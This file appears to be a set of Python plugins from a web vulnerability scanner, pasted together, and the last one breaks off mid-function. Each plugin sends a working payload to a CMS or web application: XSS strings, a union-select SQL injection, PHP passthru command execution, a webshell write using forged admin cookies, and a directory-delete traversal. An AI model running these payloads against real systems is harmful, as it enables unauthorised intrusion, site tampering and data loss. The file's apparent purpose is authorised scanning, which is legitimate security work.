def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe for the CMS Made Simple 2.2.7 reflected XSS in admin/moduleinterface.php.

    The fixed marker ``cscanhyhm2n`` is injected through ``m1_version``; the
    target is reported when it answers 200 and the marker appears anywhere in
    the body.  Findings go to VulnerabilityDetails(...).Write() and WriteFile();
    any exception is handed to ErrorHandling().Outlier() and ErrorLog().Write().

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        proxies: proxy specification, normalised by Proxies().result.
        **kwargs: forwarded unchanged to VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, host, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        # NOTE(review): the install path (/cmsms2.2.7) and the __c key are taken
        # from the original PoC environment and will rarely match a live target.
        marker = 'cscanhyhm2n'
        payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert(cscanhyhm2n)</script>&m1_filename=Adherents-0.2.6.xml"
        target = f"{scheme}://{host}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        response = requests.get(target, headers=headers, timeout=6, proxies=proxies, verify=False)
        body = response.text
        # A bare substring test also fires when the marker is reflected HTML-escaped
        # or simply echoed back in an error page, so expect false positives.
        if response.status_code == 200 and marker in body:
            Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(host, target, body)
            finding = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(finding.info, host, **kwargs).Write()
            ClassCongregation.WriteFile().result(str(host), str(Medusa))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin)
        ClassCongregation.ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + host, e)
def medusa(Url, RandomAgent, Token, proxies=None):
    """Probe the CMS Made Simple installer (install/index.php) for reflected XSS.

    A 20-character random marker is embedded in ``default_cms_lang`` via a
    ``<body onload=alert(...)>`` payload; the target is reported when it answers
    200 and the marker shows up in the body.  Results are written through
    VulnerabilityDetails(..., Token).Write() and WriteFile(); exceptions go to
    ErrorHandling().Outlier() and ErrorLog().Write().

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        Token: passed through to VulnerabilityDetails.
        proxies: proxy specification, normalised by Proxies().result.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, host, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        # Random marker so that a cached/static page cannot produce a match.
        marker = ClassCongregation.randoms().result(20)
        # NOTE(review): the /k/cms/cmsmadesimple prefix is the PoC install path.
        payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
        form = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(marker)
        target = f"{scheme}://{host}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        response = requests.post(target, data=form, headers=headers, proxies=proxies, timeout=6, verify=False)
        body = response.text
        # Matching only the marker (not the tag) also fires on an escaped reflection.
        if response.status_code == 200 and marker in body:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(host, target, body)
            finding = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(finding.info, host, Token).Write()
            ClassCongregation.WriteFile().result(str(host), str(Medusa))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin)
        ClassCongregation.ErrorLog().Write(host, plugin)
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Probe for the CMS Made Simple 2.2.7 reflected XSS in admin/moduleinterface.php.

    Same check as the RandomAgent variant, but the caller supplies the full
    header dict.  The fixed marker ``cscanhyhm2n`` is injected via ``m1_version``
    and the target is reported on a 200 whose body contains that marker.

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        Headers: request headers, sent as given (not modified here).
        proxies: proxy specification, normalised by Proxies().result.
        **kwargs: forwarded unchanged to VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, host, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        marker = 'cscanhyhm2n'
        # NOTE(review): hard-coded PoC install path and __c key; see sibling plugin.
        payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert(cscanhyhm2n)</script>&m1_filename=Adherents-0.2.6.xml"
        target = f"{scheme}://{host}:{port}{payload}"
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        response = requests.get(target, headers=Headers, timeout=6, proxies=proxies, verify=False)
        body = response.text
        # Substring match on the marker alone -> false positives when reflected escaped.
        if response.status_code == 200 and marker in body:
            Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(host, target, body)
            finding = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(finding.info, host, **kwargs).Write()
            ClassCongregation.WriteFile().result(str(host), str(Medusa))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin)
        ClassCongregation.ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + host, e)
def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe the CMS Made Simple installer for XSS through the ``docroot`` field.

    WARNING: this submits a complete installer form (database host/user/password,
    admin account, createtables=1) to install/index.php.  On an unconfigured
    target this is not a passive check and may attempt to (re)run the install.

    The target is reported when it answers 200 and the decoded ``<a href="$("<img
    ... onerror=alert(cscan-hyhmnn)>`` fragment is reflected verbatim.  Results
    go to VulnerabilityDetails(..., UnixTimestamp).Write() and WriteFile();
    exceptions are only logged via ErrorLog().Write().

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        UnixTimestamp: passed through to VulnerabilityDetails.
    """
    scheme, host, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/k/cms/cmsmadesimple/install/index.php"
        form = '''docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(cscan-hyhmnn)%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US'''
        # The decoded form of the injected docroot, as the page is expected to echo it.
        reflected = '''<a href="$("<img/src='x'/onerror=alert(cscan-hyhmnn)>'''
        target = f"{scheme}://{host}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        session = requests.session()
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        response = session.post(target, data=form, headers=headers, timeout=6, verify=False)
        body = response.text
        if response.status_code == 200 and reflected in body:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(host, target, body)
            finding = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(finding.info, host, UnixTimestamp).Write()
            ClassCongregation.WriteFile().result(str(host), str(Medusa))
    except Exception:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(host, plugin)
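def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Probe for stored XSS in CMS Made Simple 2.2.7 admin/siteprefs.php (metadata field).

    Fix: the original built ``data`` with a literal ``{}`` placeholder and never
    called ``.format(RD)``, so the random marker was not sent and the
    ``con.find(RD)`` check could never succeed.  The marker is now interpolated.

    WARNING: a successful request rewrites the target's global site preferences
    (sitename, metadata, theme, ...); this is a write operation, not a read.
    The ``__c`` key is hard-coded from the PoC, so it will normally be rejected
    unless the target happens to use that session key.

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        Headers: request headers, sent as given.
        proxies: proxy specification, normalised by Proxies().result.
        **kwargs: forwarded unchanged to VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/cmsms2.2.7/admin/siteprefs.php"
        # .format(RD) is the fix: the marker must actually be part of the body we send.
        data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''.format(RD)
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        # The marker alone is checked, so an HTML-escaped reflection also matches.
        if code == 200 and con.find(RD) != -1:
            Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)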
def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe CMS Made Simple's image manager for path traversal via ``deld``.

    WARNING: ``images.php?deld=../../`` is a *delete-directory* request, not a
    read.  If the target is vulnerable this check may remove content; treat it
    as destructive and only run it with authorisation.

    Detection is heuristic: a 200 whose body contains none of "404",
    "Not Found" or "未找到" is reported, which will also match any generic
    200 page (soft errors, redirect landings).  Results go to
    VulnerabilityDetails(..., UnixTimestamp).Write() and WriteFile();
    exceptions are logged via ErrorLog().Write().

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        UnixTimestamp: passed through to VulnerabilityDetails.
    """
    scheme, host, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/lib/filemanager/imagemanager/images.php?deld=../../"
        target = f"{scheme}://{host}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        session = requests.session()
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        response = session.get(target, headers=headers, timeout=6, verify=False)
        body = response.text
        not_found_markers = ('404', 'Not Found', '未找到')
        looks_found = all(marker not in body for marker in not_found_markers)
        if response.status_code == 200 and looks_found:
            Medusa = "{}存在CMSMS目录遍历漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(host, target, body)
            finding = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(finding.info, host, UnixTimestamp).Write()
            ClassCongregation.WriteFile().result(str(host), str(Medusa))
    except Exception:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(host, plugin)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe CraftedWeb's aasp_includes/pages/notice.php for reflected XSS via ``e``.

    A random marker is sent inside an ``<img onerror=alert('RD')>`` payload.
    The target is reported on a 200 whose body contains
    ``<script>alert(RD)</script>``.  NOTE(review): that expected string is a
    *script* tag while the payload is an *img* tag, so the match presumably
    relies on the application wrapping ``e`` in a script block itself —
    confirm against the product before trusting results.

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        proxies: proxy specification, normalised by Proxies().result.
        **kwargs: forwarded unchanged to VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, host, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        marker = ClassCongregation.randoms().result(20)
        payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(marker)
        expected = '<script>alert({})</script>'.format(marker)
        target = f"{scheme}://{host}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        response = requests.get(target, headers=headers, timeout=6, proxies=proxies, verify=False)
        body = response.text
        if response.status_code == 200 and expected in body:
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(host, target, body)
            finding = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(finding.info, host, **kwargs).Write()
            ClassCongregation.WriteFile().result(str(host), str(Medusa))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin)
        ClassCongregation.ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + host, e)
def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe CSDJCMS (/index.php/dance/so/key/) for union-based SQL injection.

    The ``key`` parameter carries a double-URL-encoded ``') and 1=2 union
    select ...`` with ``md5(4684894)`` in the second column; the target is
    reported when the quoted digest ``'904c23abadd5a4648a973c86385f3930'``
    appears in the body.  Only this marker is checked — no data is extracted.
    The HTTP status is not inspected.  Results go to
    VulnerabilityDetails(..., UnixTimestamp).Write() and WriteFile();
    exceptions go to ErrorHandling().Outlier() and ErrorLog().Write().

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        UnixTimestamp: passed through to VulnerabilityDetails.
    """
    scheme, host, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573%2565%256C%2565%2563%2574%201,md5(4684894),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20%23"
        # Expected md5(4684894), as the page prints it (quoted).
        digest = "'904c23abadd5a4648a973c86385f3930'"
        target = f"{scheme}://{host}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        session = requests.session()
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        response = session.get(target, headers=headers, timeout=6, verify=False)
        body = response.text
        if digest in body:
            Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(host, target, body)
            finding = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(finding.info, host, UnixTimestamp).Write()
            ClassCongregation.WriteFile().result(str(host), str(Medusa))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin)
        ClassCongregation.ErrorLog().Write(host, plugin)
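def medusa(Url, RandomAgent, ProxyIp):
    """Probe a Huisi (汇思) file server for arbitrary file download via downloadFile.jsp.

    Fix: the URL was assembled as ``scheme + "//" + url`` (missing the colon),
    producing e.g. ``http//host:80/...`` — an invalid URL that made every run
    fail into the error log.  It now uses ``"://"`` like the sibling plugins.

    Requests ``/WEB-INF/web.xml`` through ``filePath`` and reports the target
    when it answers 200 with "xml version" in the body.  On a hit the finding
    is rated High via VulnerabilityDetails and ``str(_t.info)`` is returned;
    otherwise None.  Exceptions are logged via ErrorLog().Write().

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        ProxyIp: accepted for interface compatibility; not used by this check.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/fileServer/fileUpload/downloadFile.jsp?filePath=/WEB-INF/web.xml"
        # "://" is the fix; the original "//" produced an unparseable URL.
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        with requests.Session() as s:
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        # "xml version" is a weak fingerprint: any XML/HTML-with-prolog 200 matches.
        if code == 200 and con.find('xml version') != -1:
            Medusa = "{}存在汇思软件任意文件下载漏洞\r\n验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()
            return (str(_t.info))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, _)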
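def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Probe admin/editusertag.php for authenticated command execution via a user tag.

    Fix: the original wrote extra keys straight into the caller's ``Headers``
    dict, leaking ``X-Requested-With``, ``Content-Length: 115`` etc. into every
    later plugin that shares that dict.  The headers are now built on a copy.
    The hand-set ``Content-Length`` was dropped: requests derives it from the
    body, so the fixed "115" was never what went on the wire.

    WARNING: the payload asks the target to run ``passthru('dir')`` — this is
    active code execution, gated only by the hard-coded ``_sk_`` key and
    ``userplugin_id`` from the PoC (they will rarely match a live session).
    A hit is a body containing ``{"response":"Success","details":"``; the
    status code is not inspected.

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        Headers: caller's base headers; not modified.
        proxies: proxy specification, normalised by Proxies().result.
        **kwargs: forwarded unchanged to VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
        data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        # Copy first so the caller's dict is left untouched (the fix).
        headers = dict(Headers)
        headers.update({
            "Accept": "*/*",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",  # the endpoint answers JSON only for AJAX calls (ajax=1)
            "Connection": "close",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache",
        })
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        if con.find('''{"response":"Success","details":"}''') != -1:
            Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)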
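def medusa(Url, RandomAgent, UnixTimestamp):
    """CSDJCMS "getshell" check: write phpinfo() into cs-bottom.php using forged admin cookies.

    Fix: the original condition was ``con.find('PHP Version') != -1 and
    con.find('System')``.  ``str.find`` returns -1 (truthy) when absent, so the
    second clause was effectively always true; it now tests ``!= -1`` as well.

    WARNING: this is an active write — the POST asks the target to store
    ``<?php phpinfo() ?>`` as ``cs-bottom.php``.  The Cookie header forges an
    admin session (CS_AdminID=1, CS_Login=<md5>) from the original PoC; the
    Referer contains a literal " ... " and is a truncated copy.  The request is
    sent to the site root — NOTE(review): no admin path is appended, confirm
    that is the intended endpoint.  ``Content-Length`` is recomputed by
    requests, so the hand-set "169" is not what is sent.

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        UnixTimestamp: passed through to VulnerabilityDetails.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload_url = scheme + "://" + url + ":" + str(port)
        referer = scheme + "://" + url
        headers = {
            "Host": "{}".format(url),
            "User-Agent": RandomAgent,
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Referer": "{}/admin/admin_t ... ;file=artindex.html".format(referer),
            "Cookie": "CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963",
            "Connection": "keep-alive",
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": "169"
        }
        # name=cs-bottom.php&content=<?php phpinfo() ?>
        data = "name=cs-bottom.php&content=%3C%3Fphp+phpinfo%28%29+%3F%3E"
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        with requests.Session() as s:
            resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False)
        con = resp.text
        # Both phpinfo() fingerprints must be present (the fix: "!= -1" on the second).
        if con.find('PHP Version') != -1 and con.find('System') != -1:
            Medusa = "{}存在CSDJCMSGetshell\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, _)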
def medusa(Url, RandomAgent, ProxyIp):
    """Check whether Cacti's database dump ``/cacti.sql`` is served from the web root.

    Reports the target when ``GET /cacti.sql`` answers 200 and the body contains
    the literal "cacti.sql".  NOTE(review): that fingerprint presumably relies on
    the dump's own header comment naming the file — confirm; a directory listing
    or error page mentioning the path would match too.  On a hit the finding is
    rated High via VulnerabilityDetails and written with WriteFile(); exceptions
    are logged via ErrorLog().Write().

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        ProxyIp: accepted for interface compatibility; not used by this check.
    """
    scheme, host, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/cacti.sql"
        target = f"{scheme}://{host}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        session = requests.session()
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        response = session.get(target, headers=headers, timeout=6, verify=False)
        body = response.text
        if response.status_code == 200 and 'cacti.sql' in body:
            Medusa = "{}存在CactiSQL数据库文件泄露漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(host, target, body)
            finding = VulnerabilityInfo(Medusa)
            # Severity ladder used by this framework: serious > High > Intermediate > Low.
            ClassCongregation.VulnerabilityDetails(finding.info).High()
            ClassCongregation.WriteFile().result(str(host), str(Medusa))
    except Exception:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(host, plugin)
def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe CraftedWeb's aasp_includes/pages/notice.php for reflected XSS via ``e``.

    Fixed-marker variant: sends ``<img src=x onerror=alert('cscan')>`` and
    reports a 200 whose body contains ``<script>alert(cscan)</script>``.
    NOTE(review): the expected fragment is a script tag while an img tag is
    injected, so this presumably depends on the application wrapping ``e`` in
    a script block — confirm before trusting the result.  Findings go to
    VulnerabilityDetails(..., UnixTimestamp).Write() and WriteFile();
    exceptions go to ErrorHandling().Outlier() and ErrorLog().Write().

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        UnixTimestamp: passed through to VulnerabilityDetails.
    """
    scheme, host, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('cscan')>"
        expected = '<script>alert(cscan)</script>'
        target = f"{scheme}://{host}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        session = requests.session()
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        response = session.get(target, headers=headers, timeout=6, verify=False)
        body = response.text
        if response.status_code == 200 and expected in body:
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(host, target, body)
            finding = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(finding.info, host, UnixTimestamp).Write()
            ClassCongregation.WriteFile().result(str(host), str(Medusa))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin)
        ClassCongregation.ErrorLog().Write(host, plugin)
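def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe for stored XSS in CMS Made Simple 2.2.7 admin/siteprefs.php (metadata field).

    Fix: ``data`` contained a literal ``{}`` placeholder but ``.format(RD)`` was
    never applied, so the random marker was not sent and ``con.find(RD)`` could
    never match.  The marker is now interpolated into the body.

    WARNING: a successful POST overwrites the target's global site preferences
    (sitename, metadata, theme, ...) — this is a write, not a read.  The
    ``__c`` key is hard-coded from the PoC and will normally not match a live
    session.

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        proxies: proxy specification, normalised by Proxies().result.
        **kwargs: forwarded unchanged to VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
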